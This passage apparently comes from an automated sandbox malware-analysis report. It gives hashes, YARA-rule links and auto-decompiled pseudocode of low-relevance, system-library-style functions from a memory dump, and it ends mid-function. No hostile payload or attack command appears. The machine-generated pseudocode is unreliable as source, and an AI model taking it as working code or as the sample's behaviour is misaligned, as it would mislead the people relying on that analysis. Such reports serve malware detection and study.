API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 21851894c180babbfef1a252a704140f3c6c5e297d292da37c4d558edd8f8fec
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 6A215071A00205EFEB20DF59C845B6AF7F8EB44764F14886AE949A7250D330ED40CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02983B7A, Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E02983B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x2a484c4; // 0x0
				_v12 = 1;
				_v8 =  *0x2a484c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L02974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x2a484c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0299AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0299FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x2a484c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x2a484c4; // 0x0
					L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x02983b89
0x02983b96
0x02983ba1
0x02983bab
0x02983bb5
0x02983bb9
0x029c6298
0x02983bbf
0x02983bc2
0x02983bc3
0x02983bc9
0x02983bca
0x02983bcc
0x02983bcd
0x02983bd4
0x02983bd6
0x02983bdb
0x02983bea
0x02983bf7
0x02983bfb
0x02983bff
0x02983c09
0x02983c0a
0x02983c0b
0x02983c0f
0x02983c14
0x02983c18
0x02983c18
0x02983bfb
0x02983c1b
0x02983c30
0x02983c30
0x02983c3d

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35912c7ff4d3abe25950ba74ab98e6d9765b57033183ad6c6b1636716611f668
Instruction ID: d748fa4abb880f885facce5a1d26aab03c8bc9a49802c1bf1ce9f920a9341a3c
Opcode Fuzzy Hash: 35912c7ff4d3abe25950ba74ab98e6d9765b57033183ad6c6b1636716611f668
Instruction Fuzzy Hash: ED219272A00108EFCB00EF58DD81B5AB7BDFB84708F1504A8EA04AB251D775ED52CB94

Uniqueness

Uniqueness Score: -1.00%

Function 029D6CF0, Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E029D6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E02977D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E02977D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x2935c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0298F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0298F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E029D7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L02972400( &_v52);
								}
								_t21 = L02972400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x029d6cfb
0x029d6d00
0x029d6d02
0x029d6d06
0x029d6d0a
0x029d6d0e
0x029d6d19
0x029d6d2b
0x029d6d1b
0x029d6d24
0x029d6d24
0x029d6d33
0x029d6d39
0x029d6d46
0x029d6d4f
0x029d6d61
0x029d6d51
0x029d6d5a
0x029d6d5a
0x029d6d69
0x029d6d6b
0x029d6d6d
0x029d6d6f
0x029d6d6f
0x029d6d74
0x029d6d79
0x029d6d7a
0x029d6d7f
0x029d6d82
0x029d6d88
0x029d6d89
0x029d6d90
0x029d6d94
0x029d6da7
0x029d6db1
0x029d6db1
0x029d6dbb
0x029d6dbb
0x029d6d90
0x029d6d69
0x029d6d46
0x029d6dc6

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84feb7203e190209982b9626a9f8c6201354debfd14cd39948fb704859bed582
Instruction ID: c329503c2ec692b82bd66da6ddabb3af5b37672af08fb9f3dadffe629cf02d00
Opcode Fuzzy Hash: 84feb7203e190209982b9626a9f8c6201354debfd14cd39948fb704859bed582
Instruction Fuzzy Hash: 9121D0725003489BC321EF6AED44BABB7ECEFC5744F094966F940C7290E734C908DAA2

Uniqueness

Uniqueness Score: -1.00%

Function 02A2070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E02A2070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E02A207DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E02A1AFDE( &_v8,  &_v12);
					E02A21293(_t38, _v28, _t60);
					if(E02977D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E02A114FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x02a2071b
0x02a20724
0x02a20734
0x02a20738
0x02a2074b
0x02a2074b
0x02a20753
0x02a20753
0x02a20759
0x02a2075d
0x02a20774
0x02a20779
0x02a2077d
0x02a20789
0x02a20795
0x02a207a7
0x02a20797
0x02a207a0
0x02a207a0
0x02a207af
0x02a207c4
0x02a207cd
0x02a207cd
0x02a207af
0x02a207dc

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 6b30fae38747e08862ea4b465975876f7a3d0153b532937d581284cd54986223
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 42210136204610AFD705DF2CC880BAABBA6EFE4750F048669F9958B381DB30D909CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0297AE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0297AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E02977D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E02977D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E02977D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E02977D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E029D7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x0297ae78
0x0297ae7c
0x0297ae7e
0x0297ae81
0x0297ae86
0x0297ae8d
0x029c2691
0x0297ae93
0x0297ae93
0x0297ae93
0x0297ae98
0x0297ae9d
0x029c26a2
0x029c26b4
0x029c26a4
0x029c26ad
0x029c26ad
0x029c26b9
0x00000000
0x029c26bb
0x00000000
0x029c26bb
0x0297aea3
0x0297aea3
0x0297aea3
0x0297aeaa
0x029c26c0
0x029c26c9
0x029c26c9
0x0297aeb3
0x029c26d4
0x029c26e1
0x00000000
0x00000000
0x029c26e7
0x029c26ee
0x029c26f0
0x029c26f9
0x029c26f9
0x029c2702
0x029c2708
0x029c2708
0x029c270b
0x029c270f
0x029c2711
0x029c2711
0x029c2725
0x029c2725
0x00000000
0x0297aeb9
0x0297aeb9
0x0297aebf
0x0297aebf
0x0297aeb3

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: d8163939882082771b46015cc7b882dfe6e16a3d33b5eb658737dcdc6d842180
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: EA210531A01680DFDB26EB69CA44F6977EDEF44344F2904A5ED448B7A2E774DC40CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 029D7794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E029D7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x2a47b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L02974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0299F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E02977D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E02999AE0();
					_t24 = L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x029d7799
0x029d779a
0x029d779b
0x029d77a3
0x029d77ab
0x029d77ae
0x029d77b1
0x029d77b1
0x029d77bf
0x029d77c4
0x029d77c8
0x029d77ce
0x029d77d4
0x029d77e0
0x029d77e0
0x029d77d6
0x029d77d6
0x029d77de
0x00000000
0x00000000
0x029d77de
0x029d77e5
0x029d77f0
0x029d77f3
0x029d77f6
0x029d77fd
0x029d7800
0x029d780c
0x029d7818
0x029d782b
0x029d781a
0x029d7823
0x029d7823
0x029d7830
0x029d7831
0x029d7838
0x029d783d
0x029d783e
0x029d784f
0x029d784f
0x029d785a

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b61cd4630466ce9ce067a1fbe80168e705bc0e8c05c8a3731d547db638beb1e7
Instruction ID: 34221e110f7543ec32b8029c1d9ccc0d16879f19cd0979580374fa8f6cc318d8
Opcode Fuzzy Hash: b61cd4630466ce9ce067a1fbe80168e705bc0e8c05c8a3731d547db638beb1e7
Instruction Fuzzy Hash: D9216D72900644ABC725DFA9D890EABB7BDEF88750F10456DE50AD7650E734E900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0298FD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0298FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E029676E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L02974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x0298fd9b
0x0298fda0
0x0298fda1
0x0298fdab
0x0298fdad
0x0298fdb0
0x0298fdb8
0x0298fe0f
0x0298fde6
0x0298fde9
0x0298fdec
0x029cc0c0
0x0298fdfe
0x0298fe06
0x0298fe06
0x029cc0c8
0x0298fe2d
0x0298fe2d
0x00000000
0x0298fe2d
0x029cc0d1
0x029cc0e0
0x029cc0e5
0x029cc0e5
0x029cc0e8
0x00000000
0x029cc0e8
0x0298fdf4
0x00000000
0x00000000
0x0298fdf6
0x0298fdfa
0x0298fe1a
0x0298fe1f
0x0298fe1f
0x0298fdfc
0x00000000
0x0298fdfc
0x0298fdcc
0x0298fdd0
0x0298fe26
0x00000000
0x0298fe26
0x0298fdd8
0x0298fddb
0x0298fddd
0x0298fde0
0x00000000

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 6b7b389d6f37f1eb34837d424604b1aa1ac356b027de2f09830327f374d7afe8
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: E2217972600A40DBCB31DF49C540A66F7E9EB94B10F6995AEE94987A11E730AC00CB80

Uniqueness

Uniqueness Score: -1.00%

Function 02959240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E02959240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x2a2f708);
				E029AD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E029995D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E029995D0();
				_t33 =  *0x2a484c4; // 0x0
				L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x2a484c4; // 0x0
				L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x2a484c4; // 0x0
				E02972280(L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x2a486b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E029995D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E029995D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E02959325();
					_t50 =  *0x2a484c4; // 0x0
					return E029AD0D1(L029777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x02959240
0x02959242
0x02959247
0x0295924c
0x0295924e
0x02959255
0x02959257
0x0295925a
0x0295925f
0x0295925f
0x02959266
0x02959271
0x02959276
0x02959279
0x0295927e
0x02959295
0x0295929a
0x029592b1
0x029592b6
0x029592d7
0x029592dc
0x029592e0
0x029592e6
0x029592e8
0x029592ee
0x02959332
0x02959333
0x02959337
0x02959338
0x0295933a
0x0295933a
0x0295933d
0x02959342
0x02959342
0x02959345
0x02959349
0x0295934e
0x02959352
0x02959357
0x029592f4
0x029592f4
0x029592f6
0x029592f9
0x02959300
0x02959306
0x02959324
0x02959324

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5f1508e11e908b91e99fffd3db4c2437ddd1d0d874ce1b7d0d78e1ba6c9e5877
Instruction ID: 2138186e1ace1b4ffc9548e9ded66d163071cf30b75b32e514fbc919615717e1
Opcode Fuzzy Hash: 5f1508e11e908b91e99fffd3db4c2437ddd1d0d874ce1b7d0d78e1ba6c9e5877
Instruction Fuzzy Hash: DA213631551600DFE721EF68CA00F5AB7FAFF48704F054968E04A87AA1CB35E952CF84

Uniqueness

Uniqueness Score: -1.00%

Function 0298B390, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da9e1bb62efcb2858b25a8dcf6d70d38ad4e36ed484eb7997b03584ead5273a5
Instruction ID: 63ca72f4f453afc432463d392151807db8a5036a3d528ff5ec22e6c03e721dc6
Opcode Fuzzy Hash: da9e1bb62efcb2858b25a8dcf6d70d38ad4e36ed484eb7997b03584ead5273a5
Instruction Fuzzy Hash: 421166337021109FCB28EE549D91A6BB29BEBC6370B3C012EDD1AC7380CE35AC02C695

Uniqueness

Uniqueness Score: -1.00%

Function 029E4257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E029E4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x2a308d0);
				E029AD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E029E41E8(__ebx, __edi, __ecx, _t39);
				E0296EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x2a487e4;
					_t18 =  *0x2a487e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x2a45cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x2a487e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x2a487e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L02957055(_t31 + 0xfffffff8);
								_t24 =  *0x2a487e0; // 0x0
								_t18 = _t24 - 1;
								 *0x2a487e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x2a45cd0;
				if( *0x2a45cd0 <= 0) {
					L02957055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x2a487e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x2a487e8 = _t30;
						 *0x2a487e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E029AD0D1(L029E4320());
			}

0x029e4257
0x029e4257
0x029e4257
0x029e4259
0x029e425e
0x029e4263
0x029e4265
0x029e4273
0x029e4278
0x029e427c
0x029e427f
0x029e4281
0x029e4287
0x029e42d7
0x029e42d7
0x029e42da
0x029e428d
0x029e428d
0x029e428f
0x029e4292
0x029e4297
0x029e429c
0x029e42a0
0x029e42a6
0x029e42a8
0x029e42ae
0x029e42b3
0x00000000
0x029e42ba
0x029e42ba
0x029e42bf
0x029e42c5
0x029e42ca
0x029e42cf
0x029e42d0
0x00000000
0x029e42d0
0x029e42b3
0x00000000
0x029e42a6
0x029e429c
0x029e42dc
0x029e42dc
0x029e42e3
0x029e4309
0x029e42e5
0x029e42e5
0x029e42e8
0x029e42ee
0x029e42f0
0x00000000
0x029e42f2
0x029e42f2
0x029e42f4
0x029e42f7
0x029e42f9
0x029e4300
0x029e4300
0x029e42f0
0x029e430e
0x029e431f

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 736c8ded096d2a4574a351c1758fd71efa71ce4b951f7f040082b9f53eafc270
Instruction ID: fff72cf873010a25b74b5ebd4a32c04dab279a2a435d66ad99ff7127a1406121
Opcode Fuzzy Hash: 736c8ded096d2a4574a351c1758fd71efa71ce4b951f7f040082b9f53eafc270
Instruction Fuzzy Hash: 89215874982601CFCF56EF64E910B24B7E6FBC5314B50AA6AC1068B790DB3AD592CF40

Uniqueness

Uniqueness Score: -1.00%

Function 02982397, Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.358703617.0000000002930000.00000040.00000001.sdmp, Offset: 02930000, based on PE: true

Associated: 00000002.00000002.358798882.0000000002A4B000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.358805587.0000000002A4F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0271bdf9a785aed4540fe449f1641dd1e705552790c43991810520787897fc7
Instruction ID: 8e9434f0f9d3926bb08a2bbb274e5610e5b3cfe39c9af31844ecaee1aa088367
Opcode Fuzzy Hash: e0271bdf9a785aed4540fe449f1641dd1e705552790c43991810520787897fc7
Instruction Fuzzy Hash: 14112B72A403806BE725BB29AC90B16B3CDABD4B10F584427FD06A7690DAB5E805CB54

Uniqueness

Uniqueness Score: -1.00%

Function 029D46A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E029D46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L02974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0299F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0298D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
